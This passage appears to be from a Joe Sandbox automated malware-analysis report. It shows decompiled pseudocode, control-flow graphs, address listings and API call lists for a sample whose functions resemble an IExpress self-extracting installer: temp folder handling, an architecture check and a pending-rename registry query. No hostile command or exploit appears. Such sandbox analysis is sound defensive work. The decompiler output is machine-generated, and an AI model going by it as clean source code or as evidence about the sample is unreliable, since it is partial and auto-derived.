                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F853FB
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85402
                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8541F
                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8542B
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85434
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85452
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                        • API String ID: 1082909758-1231568684
                                                                        • Opcode ID: 529d431f5f3824b96a9ff25301eecc8a653d5158ef20de90f8bf2c7841398568
                                                                        • Instruction ID: 1f9009007443b4ea1778144da670676d0015093c884ae24278484a89029772b5
                                                                        • Opcode Fuzzy Hash: 529d431f5f3824b96a9ff25301eecc8a653d5158ef20de90f8bf2c7841398568
                                                                        • Instruction Fuzzy Hash: 3011E77170050867E720BB369C49FFF766DEFC5721F000126F646D2190DE788947A7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 f85467-f85484 479 f8548a-f85490 call f853a1 478->479 480 f8551c-f85528 call f81680 478->480 483 f85495-f85497 479->483 484 f8552d-f85539 call f858c8 480->484 485 f8549d-f854c0 call f81781 483->485 486 f85581-f85583 483->486 493 f8553b-f85545 CreateDirectoryA 484->493 494 f8554d-f85552 484->494 495 f8550c-f8551a call f8658a 485->495 496 f854c2-f854d8 GetSystemInfo 485->496 489 f8558d-f8559d call f86ce0 486->489 498 f85577-f8557c call f86285 493->498 499 f85547 493->499 500 f85554-f85557 call f8597d 494->500 501 f85585-f8558b 494->501 495->484 502 f854da-f854dd 496->502 503 f854fe 496->503 498->486 499->494 511 f8555c-f8555e 500->511 501->489 509 f854df-f854e2 502->509 510 f854f7-f854fc 502->510 512 f85503-f85507 call f8658a 503->512 513 f854f0-f854f5 509->513 514 f854e4-f854e7 509->514 510->512 511->501 515 f85560-f85566 511->515 512->495 513->512 514->495 517 f854e9-f854ee 514->517 515->486 518 f85568-f85575 RemoveDirectoryA 515->518 517->512 518->486
                                                                        C-Code - Quality: 75%
                                                                        			E00F85467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _SYSTEM_INFO _v304;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t10;
                                                                        				void* _t13;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				signed int _t26;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        				CHAR* _t48;
                                                                        				signed int _t49;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t10 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t10 ^ _t49;
                                                                        				_push(__ecx);
                                                                        				if(__edx == 0) {
                                                                        					_t48 = 0xf891e4;
                                                                        					_t42 = 0x104;
                                                                        					E00F81680(0xf891e4, 0x104);
                                                                        					L14:
                                                                        					_t13 = E00F858C8(_t48); // executed
                                                                        					if(_t13 != 0) {
                                                                        						L17:
                                                                        						_t42 = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L23:
                                                                        							 *0xf89124 = 0;
                                                                        							_t14 = 1;
                                                                        							L24:
                                                                        							return E00F86CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                        						}
                                                                        						_t16 = E00F8597D(_t48, _t42, 1, 0); // executed
                                                                        						if(_t16 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t61 =  *0xf88a20; // 0x0
                                                                        						if(_t61 != 0) {
                                                                        							 *0xf88a20 = 0;
                                                                        							RemoveDirectoryA(_t48);
                                                                        						}
                                                                        						L22:
                                                                        						_t14 = 0;
                                                                        						goto L24;
                                                                        					}
                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                        						 *0xf89124 = E00F86285();
                                                                        						goto L22;
                                                                        					}
                                                                        					 *0xf88a20 = 1;
                                                                        					goto L17;
                                                                        				}
                                                                        				_t42 =  &_v268;
                                                                        				_t20 = E00F853A1(__ecx,  &_v268); // executed
                                                                        				if(_t20 == 0) {
                                                                        					goto L22;
                                                                        				}
                                                                        				_push(__ecx);
                                                                        				_t48 = 0xf891e4;
                                                                        				E00F81781(0xf891e4, 0x104, __ecx,  &_v268);
                                                                        				if(( *0xf89a34 & 0x00000020) == 0) {
                                                                        					L12:
                                                                        					_t42 = 0x104;
                                                                        					E00F8658A(_t48, 0x104, 0xf81140);
                                                                        					goto L14;
                                                                        				}
                                                                        				GetSystemInfo( &_v304);
                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                        				if(_t26 == 0) {
                                                                        					_push("i386");
                                                                        					L11:
                                                                        					E00F8658A(_t48, 0x104);
                                                                        					goto L12;
                                                                        				}
                                                                        				_t28 = _t26 - 1;
                                                                        				if(_t28 == 0) {
                                                                        					_push("mips");
                                                                        					goto L11;
                                                                        				}
                                                                        				_t29 = _t28 - 1;
                                                                        				if(_t29 == 0) {
                                                                        					_push("alpha");
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t29 != 1) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_push("ppc");
                                                                        				goto L11;
                                                                        			}




















                                                                        0x00f85472
                                                                        0x00f85479
                                                                        0x00f85481
                                                                        0x00f85484
                                                                        0x00f8551c
                                                                        0x00f85521
                                                                        0x00f85528
                                                                        0x00f8552d
                                                                        0x00f8552f
                                                                        0x00f85539
                                                                        0x00f8554d
                                                                        0x00f8554d
                                                                        0x00f85552
                                                                        0x00f85585
                                                                        0x00f85585
                                                                        0x00f8558b
                                                                        0x00f8558d
                                                                        0x00f8559d
                                                                        0x00f8559d
                                                                        0x00f85557
                                                                        0x00f8555e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85560
                                                                        0x00f85566
                                                                        0x00f85569
                                                                        0x00f8556f
                                                                        0x00f8556f
                                                                        0x00f85581
                                                                        0x00f85581
                                                                        0x00000000
                                                                        0x00f85581
                                                                        0x00f85545
                                                                        0x00f8557c
                                                                        0x00000000
                                                                        0x00f8557c
                                                                        0x00f85547
                                                                        0x00000000
                                                                        0x00f85547
                                                                        0x00f8548a
                                                                        0x00f85490
                                                                        0x00f85497
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8549d
                                                                        0x00f854ab
                                                                        0x00f854b4
                                                                        0x00f854c0
                                                                        0x00f8550c
                                                                        0x00f85511
                                                                        0x00f85515
                                                                        0x00000000
                                                                        0x00f85515
                                                                        0x00f854c9
                                                                        0x00f854d6
                                                                        0x00f854d8
                                                                        0x00f854fe
                                                                        0x00f85503
                                                                        0x00f85507
                                                                        0x00000000
                                                                        0x00f85507
                                                                        0x00f854da
                                                                        0x00f854dd
                                                                        0x00f854f7
                                                                        0x00000000
                                                                        0x00f854f7
                                                                        0x00f854df
                                                                        0x00f854e2
                                                                        0x00f854f0
                                                                        0x00000000
                                                                        0x00f854f0
                                                                        0x00f854e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f854e9
                                                                        0x00000000

                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F854C9
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8553D
                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8556F
                                                                          • Part of subcall function 00F853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F853FB
                                                                          • Part of subcall function 00F853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85402
                                                                          • Part of subcall function 00F853A1: GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8541F
                                                                          • Part of subcall function 00F853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8542B
                                                                          • Part of subcall function 00F853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                        • API String ID: 1979080616-4535649
                                                                        • Opcode ID: b1a7f2beff07830a5407aa7bf735c093541617e15bf54abf46a8b67381a72a68
                                                                        • Instruction ID: bc241b1177b749ffbc824f119cf3311f203d3b554e0798736eaf3e8210702c85
                                                                        • Opcode Fuzzy Hash: b1a7f2beff07830a5407aa7bf735c093541617e15bf54abf46a8b67381a72a68
                                                                        • Instruction Fuzzy Hash: F4312971F04A045BCF10BF299C496FF779FAB81F54B0C016AA402CA540DB74CE06B795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 519 f8256d-f8257d 520 f82622-f82627 call f824e0 519->520 521 f82583-f82589 519->521 526 f82629-f8262f 520->526 522 f825e8-f82607 RegOpenKeyExA 521->522 523 f8258b 521->523 528 f82609-f82620 RegQueryInfoKeyA 522->528 529 f825e3-f825e6 522->529 523->526 527 f82591-f82595 523->527 527->526 530 f8259b-f825ba RegOpenKeyExA 527->530 531 f825d1-f825dd RegCloseKey 528->531 529->526 530->529 532 f825bc-f825cb RegQueryValueExA 530->532 531->529 532->531
                                                                        C-Code - Quality: 86%
                                                                        			E00F8256D(signed int __ecx) {
                                                                        				int _v8;
                                                                        				void* _v12;
                                                                        				signed int _t13;
                                                                        				signed int _t19;
                                                                        				long _t24;
                                                                        				void* _t26;
                                                                        				int _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                        				_t31 = 0;
                                                                        				if(_t13 == 0) {
                                                                        					_t31 = E00F824E0(_t26);
                                                                        				} else {
                                                                        					_t34 = _t13 - 1;
                                                                        					if(_t34 == 0) {
                                                                        						_v8 = 0;
                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                        							goto L7;
                                                                        						} else {
                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                        							goto L6;
                                                                        						}
                                                                        						L12:
                                                                        					} else {
                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                        							_v8 = 0;
                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                        							if(_t24 == 0) {
                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                        								L6:
                                                                        								asm("sbb eax, eax");
                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                        								RegCloseKey(_v12); // executed
                                                                        							}
                                                                        							L7:
                                                                        							_t31 = _v8;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        				goto L12;
                                                                        			}











                                                                        0x00f82572
                                                                        0x00f82573
                                                                        0x00f82575
                                                                        0x00f82578
                                                                        0x00f8257d
                                                                        0x00f82627
                                                                        0x00f82583
                                                                        0x00f82586
                                                                        0x00f82589
                                                                        0x00f825eb
                                                                        0x00f82607
                                                                        0x00000000
                                                                        0x00f82609
                                                                        0x00f8261a
                                                                        0x00000000
                                                                        0x00f8261a
                                                                        0x00000000
                                                                        0x00f8258b
                                                                        0x00f8258b
                                                                        0x00f8259e
                                                                        0x00f825b2
                                                                        0x00f825ba
                                                                        0x00f825cb
                                                                        0x00f825d1
                                                                        0x00f825d6
                                                                        0x00f825da
                                                                        0x00f825dd
                                                                        0x00f825dd
                                                                        0x00f825e3
                                                                        0x00f825e3
                                                                        0x00f825e3
                                                                        0x00f8258b
                                                                        0x00f82589
                                                                        0x00f8262f
                                                                        0x00000000

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00F84096,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?), ref: 00F825B2
                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?,00F84096), ref: 00F825CB
                                                                        • RegCloseKey.KERNELBASE(?,?,00F81ED3,00000001,00000000,?,?,00F84137,?,00F84096), ref: 00F825DD
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00F84096,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?), ref: 00F825FF
                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00F84096,00000000,00000000,00000000,00000000,?,00F81ED3,00000001,00000000), ref: 00F8261A
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00F825F5
                                                                        • PendingFileRenameOperations, xrefs: 00F825C3
                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00F825A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                        • API String ID: 2209512893-559176071
                                                                        • Opcode ID: ef950f5a6a8935b6af500e9c7c36b9c9cf68b8555cc58c3bb4ed225a6ec60677
                                                                        • Instruction ID: 3f7f22f73cee6fd3cb285c981160f7b67211c09418aa3547983cb833f8032f69
                                                                        • Opcode Fuzzy Hash: ef950f5a6a8935b6af500e9c7c36b9c9cf68b8555cc58c3bb4ed225a6ec60677
                                                                        • Instruction Fuzzy Hash: E3114235D42228FBAF20AB919C09DFB7FBCDF057A1F544056B808A2011DB30AE45F7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 533 f86a60-f86a91 call f87155 call f87208 GetStartupInfoW 539 f86a93-f86aa2 533->539 540 f86abc-f86abe 539->540 541 f86aa4-f86aa6 539->541 544 f86abf-f86ac5 540->544 542 f86aa8-f86aad 541->542 543 f86aaf-f86aba Sleep 541->543 542->544 543->539 545 f86ad1-f86ad7 544->545 546 f86ac7-f86acf _amsg_exit 544->546 547 f86ad9-f86ae9 call f86c3f 545->547 548 f86b05 545->548 549 f86b0b-f86b11 546->549 553 f86aee-f86af2 547->553 548->549 551 f86b2e-f86b30 549->551 552 f86b13-f86b24 _initterm 549->552 554 f86b3b-f86b42 551->554 555 f86b32-f86b39 551->555 552->551 553->549 556 f86af4-f86b00 553->556 557 f86b44-f86b51 call f87060 554->557 558 f86b67-f86b71 554->558 555->554 560 f86c39-f86c3e call f8724d 556->560 557->558 571 f86b53-f86b65 557->571 559 f86b74-f86b79 558->559 562 f86b7b-f86b7d 559->562 563 f86bc5-f86bc8 559->563 568 f86b7f-f86b81 562->568 569 f86b94-f86b98 562->569 566 f86bca-f86bd3 563->566 567 f86bd6-f86be3 _ismbblead 563->567 566->567 572 f86be9-f86bed 567->572 573 f86be5-f86be6 567->573 568->563 574 f86b83-f86b85 568->574 575 f86b9a-f86b9e 569->575 576 f86ba0-f86ba2 569->576 571->558 572->559 573->572 574->569 577 f86b87-f86b8a 574->577 578 f86ba3-f86bbc call f82bfb 575->578 576->578 577->569 580 f86b8c-f86b92 577->580 583 f86c1e-f86c25 578->583 584 f86bbe-f86bbf exit 578->584 580->574 585 f86c32 583->585 586 f86c27-f86c2d _cexit 583->586 584->563 585->560 586->585
                                                                        C-Code - Quality: 51%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int* _t25;
                                                                        				signed int _t26;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				signed int _t37;
                                                                        				signed char _t41;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t62;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				E00F87155();
                                                                        				_push(0x58);
                                                                        				_push(0xf872b8);
                                                                        				E00F87208(__ebx, __edi, __esi);
                                                                        				 *(_t62 - 0x20) = 0;
                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                        				_t53 = 0;
                                                                        				while(1) {
                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                        					if(0 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(0 != _t56) {
                                                                        						Sleep(0x3e8);
                                                                        						continue;
                                                                        					} else {
                                                                        						_t58 = 1;
                                                                        						_t53 = 1;
                                                                        					}
                                                                        					L7:
                                                                        					_t67 =  *0xf888b0 - _t58; // 0x2
                                                                        					if(_t67 != 0) {
                                                                        						__eflags =  *0xf888b0; // 0x2
                                                                        						if(__eflags != 0) {
                                                                        							 *0xf881e4 = _t58;
                                                                        							goto L13;
                                                                        						} else {
                                                                        							 *0xf888b0 = _t58;
                                                                        							_t37 = E00F86C3F(0xf810b8, 0xf810c4); // executed
                                                                        							__eflags = _t37;
                                                                        							if(__eflags == 0) {
                                                                        								goto L13;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        								_t30 = 0xff;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_push(0x1f);
                                                                        						L00F86FF4();
                                                                        						L13:
                                                                        						_t68 =  *0xf888b0 - _t58; // 0x2
                                                                        						if(_t68 == 0) {
                                                                        							_push(0xf810b4);
                                                                        							_push(0xf810ac);
                                                                        							L00F87202();
                                                                        							 *0xf888b0 = 2;
                                                                        						}
                                                                        						if(_t53 == 0) {
                                                                        							 *0xf888ac = 0;
                                                                        						}
                                                                        						_t71 =  *0xf888b4;
                                                                        						if( *0xf888b4 != 0 && E00F87060(_t71, 0xf888b4) != 0) {
                                                                        							_t60 =  *0xf888b4; // 0x0
                                                                        							 *0xf8a288(0, 2, 0);
                                                                        							 *_t60();
                                                                        						}
                                                                        						_t25 = __imp___acmdln; // 0x76725b9c
                                                                        						_t59 =  *_t25;
                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                        						_t54 =  *(_t62 - 0x20);
                                                                        						while(1) {
                                                                        							_t41 =  *_t59;
                                                                        							if(_t41 > 0x20) {
                                                                        								goto L32;
                                                                        							}
                                                                        							if(_t41 != 0) {
                                                                        								if(_t54 != 0) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                        										_t59 = _t59 + 1;
                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                        										_t41 =  *_t59;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                        								_t29 = 0xa;
                                                                        							} else {
                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                        							}
                                                                        							_push(_t29);
                                                                        							_t30 = E00F82BFB(0xf80000, 0, _t59); // executed
                                                                        							 *0xf881e0 = _t30;
                                                                        							__eflags =  *0xf881f8;
                                                                        							if( *0xf881f8 == 0) {
                                                                        								exit(_t30); // executed
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags =  *0xf881e4;
                                                                        							if( *0xf881e4 == 0) {
                                                                        								__imp___cexit();
                                                                        								_t30 =  *0xf881e0; // 0x0
                                                                        							}
                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        							goto L40;
                                                                        							L32:
                                                                        							__eflags = _t41 - 0x22;
                                                                        							if(_t41 == 0x22) {
                                                                        								__eflags = _t54;
                                                                        								_t15 = _t54 == 0;
                                                                        								__eflags = _t15;
                                                                        								_t54 = 0 | _t15;
                                                                        								 *(_t62 - 0x20) = _t54;
                                                                        							}
                                                                        							_t26 = _t41 & 0x000000ff;
                                                                        							__imp___ismbblead(_t26);
                                                                        							__eflags = _t26;
                                                                        							if(_t26 != 0) {
                                                                        								_t59 = _t59 + 1;
                                                                        								__eflags = _t59;
                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                        							}
                                                                        							_t59 = _t59 + 1;
                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                        						}
                                                                        					}
                                                                        					L40:
                                                                        					return E00F8724D(_t30);
                                                                        				}
                                                                        				_t58 = 1;
                                                                        				__eflags = 1;
                                                                        				goto L7;
                                                                        			}


















                                                                        0x00f86a60
                                                                        0x00f86a6a
                                                                        0x00f86a6c
                                                                        0x00f86a71
                                                                        0x00f86a78
                                                                        0x00f86a7f
                                                                        0x00f86a85
                                                                        0x00f86a8e
                                                                        0x00f86a91
                                                                        0x00f86a93
                                                                        0x00f86a9c
                                                                        0x00f86aa2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f86aa6
                                                                        0x00f86ab4
                                                                        0x00000000
                                                                        0x00f86aa8
                                                                        0x00f86aaa
                                                                        0x00f86aab
                                                                        0x00f86aab
                                                                        0x00f86abf
                                                                        0x00f86abf
                                                                        0x00f86ac5
                                                                        0x00f86ad1
                                                                        0x00f86ad7
                                                                        0x00f86b05
                                                                        0x00000000
                                                                        0x00f86ad9
                                                                        0x00f86ad9
                                                                        0x00f86ae9
                                                                        0x00f86af0
                                                                        0x00f86af2
                                                                        0x00000000
                                                                        0x00f86af4
                                                                        0x00f86af4
                                                                        0x00f86afb
                                                                        0x00f86afb
                                                                        0x00f86af2
                                                                        0x00f86ac7
                                                                        0x00f86ac7
                                                                        0x00f86ac9
                                                                        0x00f86b0b
                                                                        0x00f86b0b
                                                                        0x00f86b11
                                                                        0x00f86b13
                                                                        0x00f86b18
                                                                        0x00f86b1d
                                                                        0x00f86b24
                                                                        0x00f86b24
                                                                        0x00f86b30
                                                                        0x00f86b39
                                                                        0x00f86b39
                                                                        0x00f86b3b
                                                                        0x00f86b42
                                                                        0x00f86b57
                                                                        0x00f86b5f
                                                                        0x00f86b65
                                                                        0x00f86b65
                                                                        0x00f86b67
                                                                        0x00f86b6c
                                                                        0x00f86b6e
                                                                        0x00f86b71
                                                                        0x00f86b74
                                                                        0x00f86b74
                                                                        0x00f86b79
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f86b7d
                                                                        0x00f86b81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f86b83
                                                                        0x00f86b8c
                                                                        0x00f86b8d
                                                                        0x00f86b90
                                                                        0x00f86b90
                                                                        0x00f86b83
                                                                        0x00f86b81
                                                                        0x00f86b94
                                                                        0x00f86b98
                                                                        0x00f86ba2
                                                                        0x00f86b9a
                                                                        0x00f86b9a
                                                                        0x00f86b9a
                                                                        0x00f86ba3
                                                                        0x00f86bab
                                                                        0x00f86bb0
                                                                        0x00f86bb5
                                                                        0x00f86bbc
                                                                        0x00f86bbf
                                                                        0x00000000
                                                                        0x00f86bbf
                                                                        0x00f86c1e
                                                                        0x00f86c25
                                                                        0x00f86c27
                                                                        0x00f86c2d
                                                                        0x00f86c2d
                                                                        0x00f86c32
                                                                        0x00000000
                                                                        0x00f86bc5
                                                                        0x00f86bc5
                                                                        0x00f86bc8
                                                                        0x00f86bcc
                                                                        0x00f86bce
                                                                        0x00f86bce
                                                                        0x00f86bd1
                                                                        0x00f86bd3
                                                                        0x00f86bd3
                                                                        0x00f86bd6
                                                                        0x00f86bda
                                                                        0x00f86be1
                                                                        0x00f86be3
                                                                        0x00f86be5
                                                                        0x00f86be5
                                                                        0x00f86be6
                                                                        0x00f86be6
                                                                        0x00f86be9
                                                                        0x00f86bea
                                                                        0x00f86bea
                                                                        0x00f86b74
                                                                        0x00f86c39
                                                                        0x00f86c3e
                                                                        0x00f86c3e
                                                                        0x00f86abe
                                                                        0x00f86abe
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F87155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F87182
                                                                          • Part of subcall function 00F87155: GetCurrentProcessId.KERNEL32 ref: 00F87191
                                                                          • Part of subcall function 00F87155: GetCurrentThreadId.KERNEL32 ref: 00F8719A
                                                                          • Part of subcall function 00F87155: GetTickCount.KERNEL32 ref: 00F871A3
                                                                          • Part of subcall function 00F87155: QueryPerformanceCounter.KERNEL32(?), ref: 00F871B8
                                                                        • GetStartupInfoW.KERNEL32(?,00F872B8,00000058), ref: 00F86A7F
                                                                        • Sleep.KERNEL32(000003E8), ref: 00F86AB4
                                                                        • _amsg_exit.MSVCRT ref: 00F86AC9
                                                                        • _initterm.MSVCRT ref: 00F86B1D
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00F86B49
                                                                        • exit.KERNELBASE ref: 00F86BBF
                                                                        • _ismbblead.MSVCRT ref: 00F86BDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
